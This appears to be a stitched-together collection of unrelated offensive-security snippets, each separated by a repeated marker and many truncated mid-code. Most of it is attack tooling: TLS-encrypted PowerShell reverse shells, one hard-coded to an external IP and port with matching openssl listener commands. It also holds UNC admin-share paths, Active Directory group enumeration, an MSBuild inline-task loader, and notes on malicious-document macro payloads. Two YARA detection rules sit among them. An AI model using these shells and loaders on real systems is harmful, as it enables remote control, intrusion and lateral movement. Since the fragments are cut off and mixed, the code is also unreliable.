clr2of8

# Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator)
c:\Windows\System32\notepad.exe

# UNC Paths (begins with two separators w/o a question mark or period following)
\\127.0.0.1\c$\Windows\System32\notepad.exe
\\LOCALHOST\c$\Windows\System32\notepad.exe
\\::1\c$\Windows\System32\notepad.exe
\\0:0:0::1\c$\Windows\System32\notepad.exe
\\127.0.0.1\admin$\System32\notepad.exe
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe

clr2of8

Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }

clr2of8

function openssl-c2 ($ip,$port,$domain="fake.domain") {
$socket = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)

clr2of8

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
   <FragmentExample />
   <ClassExample />
  </Target>
  <UsingTask

clr2of8

rule rtf_with_embedded_macro_enabled_office_document 
{ 
     meta: 
          description = "RTF file with multiple embedded macro-enabled documents" 
          weight  = 90 
          author = "Walmart Information Security" 
          date = "2019-03-14" 

     strings: 
          // Headers of files to look for 

clr2of8

rule rtf_with_multiple_embedded_docs 
{ 
     meta: 
          description = "RTF file with multiple embedded macro-enabled documents" 
          weight  = 90 
          author = "Walmart Information Security" 
          date = "2019-03-14"   

     strings: 
          // Headers of files to look for 

clr2of8

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

0. Page substiution macro for luring user to click Enable Content
1. The Unicorn Powershell based payload

clr2of8

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 9876

clr2of8

$socket = New-Object Net.Sockets.TcpClient('206.189.70.79', 9876)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);

clr2of8

var webSocketDebuggerUrl;
var port = 9666;
var request = new XMLHttpRequest();
request.open("GET", "http://localhost:" + port + "/json");
request.responseType = 'json';
request.send();
request.onload = function() {
 webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;
 console.log(webSocketDebuggerUrl);